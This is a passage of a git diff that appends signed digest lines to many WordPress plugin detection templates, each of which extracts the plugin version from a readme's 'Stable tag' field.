+# digest: 4a0a00473045022100a2d8648dead9c7ba862f28121138fbf0322240b046f40f583efc2cfaec0b3d0002200f0494a5552c534d12a2c3fa69dd2d4cf0ad0466ca9dbe7690b6dd336eb5de75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..0ac945fe6c 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020b64c214bdbae07808ff87f625e48c97d952d402687775e9cdc1427251885b40221009cac3e880ed467b7e86a8aa526a9275c63f3220fd650f599c4643e4b6d07df4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..85dca09d05 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aaa474f442fe717a5599b84f44e760428f06e7d7a87fd6bc53b4156a1108287c0221009be9c658b6d8b00a92874cf46306d0d912c991ea74563168fe90c92c236b7f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..09dee41d54 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204801b758b6aa71256e8286c8310d0d71d8a6f710bf7bdc5701e7cc942e588be20221009d330c47d6e5b27cec91b5c7c9004eca4963ce12e33e724fdfcc07e82512016a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..a52dc9735f 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053740a49846f85c4bb1983f02ace0df4c4b526c6deb2bae6840f84c39475b04d022022a322e509274436a3cb6dcd279b0678f1ee59bfd012f688769524e1b089d995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..5c51cb978e 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ede22a3530a1723c832f6d9341d434ae56fbfe1be3df3eaf023d6c93fb0e4dfe022100a58e9550f8528df2634080d0e60fd1d919c859ecd3c13743a892aee29b3aa0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..9d3e90387e 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a623e871ce932f1c3fcafd1dcdc334fb148206897a3fe0ea1a3eceba35a80e5d022100e715c933737f9a932adf75a983025eec0e1cc4187879233bc7060b737c1e4ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..ec59967311 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f9ca59ddb365c4c666ec7e87521fd010afd02f26e11a66a2357dae5af8262df022100f23943f7c0af9a35d02dc224a9ff8328a6f5ea4b4989759db427a2232c35ba6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..fd24e035c0 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e6d917f9a396f1c5e7a9036b3d4b57a5f8af9947518a01030899060ebb1465c3022100be25d0a7c22e87857b5b3baae47f000e4c72f6d8e48399caffc30e76dff049ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..24ab3a3a8f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3b550b5220c6bb4910737602d7888b6a639393b6890b24f54462dce4936943b022100c7291f3bc6567927d5ba3bd2569694fc695e4bc2848c11ecbb412fd9403015df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..ec601e3357 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079ceb998948d76e0224e64d454bb740761c8e64a783b027be424f5c47b1dc96102203b27d025c9f5b753c021c864b52d4058e9a5a0d4a17192fed8ed6d6f30d8fd53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..0fadf5f7e5 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fd011ac56574f4c14393314f5030a3aab902b4882040b026d22ccb0d81bafc102210099d3d62aa889b06d7f8fa9b1cb3505c2b2d79b9e8958c9841bbec3823e352b13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..9647261e55 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204db348148cdbaaf9c9cdd69a97bbe1dfec5e83b498d23c98d60b5e8e3a95e116022100bc994fd115b98fca6b9c8c278951b6594eb528c337a896241a023c3457192ae4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..ea74498125 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021e0fc8856438eb9efc38e0923f5abac3314e4f340ff87831554e1a54bdc49c802200d8d2f092d62352bd4e0e60de51ce10d6eb508e872f96058a0677912540b4cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..809d6500a8 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c608e58aadac597e9df1b35ad322a8788636597622b18955926b1b34d6f59105022100aee66f91fcba192153599d0110fb9fc649699561a7ee5e3ffff406854f6b2b7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..de446e3d5e 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c7d7b8bc7ccfb84add7960300c7fe6a4eebd942645f5bba7e8c06f36f1ed37c02205f4eeb226d6f1d7823e2e7897a75b6cfdb0df2a635d033ad35cb36f63ffdef12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..15a042f257 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0b1666c7967bc6dab413312775344a686df5cda8d76754b9ed82ad09a1e1aa1022100ec625096c60cff7a12aab9c0b3b8a646612f67dc06a3b59ad7ab4cda4d57241d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..8c969171c0 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ee3e076d9d450f77aeaf5f82c5508790da782b4528bd9ba331fd9f62160e908022100d1d92dce30c381b6b8355b129670add214fde4c59f45f2848750c0440133fdf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..bf6b08df78 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220539f78e26a6aa217c4828639c851f50a20d6edf7ddbd67e27a85adb52a3aa13802205d9aad27355348dd0a96f39ae6ad262267b2f13ff409e93d8dd56c66763947f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..2ea69152f3 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220474dcdbd7071db156fdb90bf0d04e5f527a8a96f07673f41824b7dc78d7f30fd022100d16a7b1c7369250ffb079f6ac03390ab6d923e427d98099ed57f40892583e113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..c91413bd5c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c1f1d075e74ab2517ab90d390897ee26a9d76bb1d7aaa0839b4853ae8811919022054ec4bf1267fba5b02ab8f46809ffb90a42af2a7c8e90e035901e1e21bbc1536:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..5eb01964a5 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220207d69a7a1fa0514872b349924a4278e6e3a9f656b3aa9ad5b18b894200b5eff02206207b846c878968581de06bed87c3b1c1ba4a1ead8f67c43e0a63b86086089e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..7569977413 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ed772f8af2a1f4f4a412d225fcb8f2289aa17c8f95a4b85d16ce387866314c4c022100f8186c610bc6cf02a2b6d8ef4953f056eac0cb91052151d16ab4a311632e8fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..823d909d42 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bcf764e9f3dc2e92356b658b827fa3ae273f619470a44c299fa9e039795f4240220763dd785279af595159ae48a1d0168d687785490ab4c8a56c6b9c2ec6a659298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..72466cd6c1 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402210097cfeae17e1229c61f71fab510238dd6092349535168ab6f87cf360b4ae87925021f7699e50ecd46ef873cb5669102b9e980341e0801f27345ea25f3819ed74dcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..4dba1252a8 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078aa6ece72b2e438658f55842fa8084a22f2269b7ef98081192877f71805a94702204e0b2e94799e722cbea0bc5f4424c3cd85401a932d093f02265b7f4b2e8b8e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..96dafab406 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100beed566a6785c22bc6f70f9dc741f800657bccc6cbe087e798a4aef5deaeea1502200b4f0ebea21be98c873498541255ef7611faf56f794c47c400ad23788cd2c207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..65cc1eb6b8 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5129f2f8275a5879acdee919da2a12dabfa33f0ae39745420bdeba38f1e18a602203cc49d7398d7bdd68281267f39857cb874f918b236acafe04a74d71e53c1b660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..44cf1147c8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2e5e8c407bbaaf376ea5a4208f867002922097b0cc0d395a9ee831d13edd7e5022100b53addfbcdd40a498883c2a7901fbecddc818b8fc6ddd9d43d0eab6ba3d58c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..46171c8d96 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202046305f7428851d17fde71c95c9d6442eeb2cf9aa01638ecd4b79a01943e07702201c1b7b571c480bc474d370286a7627413e8267bd8eb3a1bc32259303ed2558d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..e267f54d72 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202fd1a0878c5aea260526994ff7eb23627c41fbfab79604dc00a1029ee1c30c8f02210098584a84d79716b5d779e4e057cc7798cf236343f0d5de582c2cfb8b92a4848a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..a44e4aae0b 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f5772eac7f83c143b2ca73c6ebd0a332a992728376af33038799e33c2cf2020022100b390768cf10a7239864ee854508d430ba1e67394e9692dae87c895cfa1bce96e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..5b803d6e68 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066bfffc64973f4bd5a21c19b1d198a24768a239e0669fbb6c04c18837c22973902206fffd9aa1b03213e66642b33819bdc1871c2b944e3819d560d2fdc96bfa30556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..d4b250007c 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce1c17023b14c4916f6c34dd11d3bcfe173c2ea1710ee69e90f06b407f30cdcf0221009f0454c7604e51c6a5ce92ca4f9bcfed9f8a7242c641919804f33974757b6ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..248b596443 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c12303dd00086f4a7cf4f5a41b3a1e8b45e8ff7b41afd4ea4579a65c106315e1022100900b19cb6e0f9d51f49698f404fe53d10df9e82d668d7545df9d6d08e981b563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..fa09956673 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fcf8caf7813f2f40afde6946b6c3b233ab23e4a160cfc9b6b4141d88248fe49102210090de491443af1b18902a487a6cace7e56f67bd1eef74bcc12bc430a03603148a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..28f33d8cfd 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc8168a6adda7351ac169c17187b5c3a722f7e79cfec8a9fe7602f3dd97d4d83022100a274bbb3e6c2a27e09e3219d2aa62ca9f8efe603867a3ab836447500f2d00f04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..be383e6b9e 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0ec7b611a7e283c67d26821b2033bd2a832035b2f5fd38ae40e121173da77d502201c8c1ebf8826ce8e4c5bfd9d9fec4b43de0e8d833da05c7512fa120cd350af53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..e1239a51f4 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220345323739d17a08a87a7c422092304ed313956e5c9c438769b4843364c0efc7a02207e6e19efe959e89795ed31cc805c8e83f9e992792fc2e09ad047225e9c797931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..6fe90dbf5f 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d6d4378846ac12f618c83bb3d86ef10aea1ab6f95b3bce5d12eba4c2812d48bf02210094ca5660a4309b906d80a03c388f57a8051d8eb7dde112df92aee5ec53dfd455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..b9869c7b99 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053c9d8122368b7585d84e48deadce616e848c4ef2dcb1b748dcbed6e9127775002210094b70ca92c6b44fa6b3e129b8111b10c3c219a7f41a6621d0a9bc3acf825e253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..a61fb41153 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210088483fd0b8c651c1854b527c339d4b6bc772f36accd9c6b237f34a6e49db5a90022058812ae5e5a05a4606a39bd9f6b97ee06202b73543c718387a0ce6f20e532370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..76d7cae0f8 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204bc06d286066a35798dc84541fcbb5d8382483f65710cc4404bd72db231113fa0221008ce0cb23b1ae31d0e07a5780702e6696b5e0f8b761004102d66cd24890fdbc6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..dfc3b14a84 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206601a1e5c592aa924b908c05624bdd4018edcf50fa50237c61739f2f5a539e60022024b19a1bb60d6e925914f814c9fca3e25cbe932c2d2dc4f312c9f58701e93ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..ad9960e981 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d36a6bd6ff7f14ff1736f14ea4128ff99217860a4cc9b6c3d913b1d6776ce990220281b779c94502d76ac9e5aa9640777ef66f94f0fa363d25df28945b4d749fc87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..54d6679273 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009515102459464ac71694cb0d19548b1bbc95a882b77a72d1555e582c0f554c65022100e949135eb0a75a5301dd501b2dd4d1ae45ad2263aa8f5296aadfa159a4920f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..b312f8bdb8 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203dff5da038abd31310c43128f7730f668b8e9345a992f93bb65b64acbaf1dd14022100aa8283502b648bf39930c32294c3b903b14e518589daeddd4bcfb8a400dd444a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..df4a11445b 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1860ee467a872a2f658bbb4a433a153ee4de4fe360c3aadc160094a70cc527a022049565e9a5ea817b5cb167f7cabfc24aaf465e773cc03e91eca40968a04f10ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..e6c62ef8c3 100644 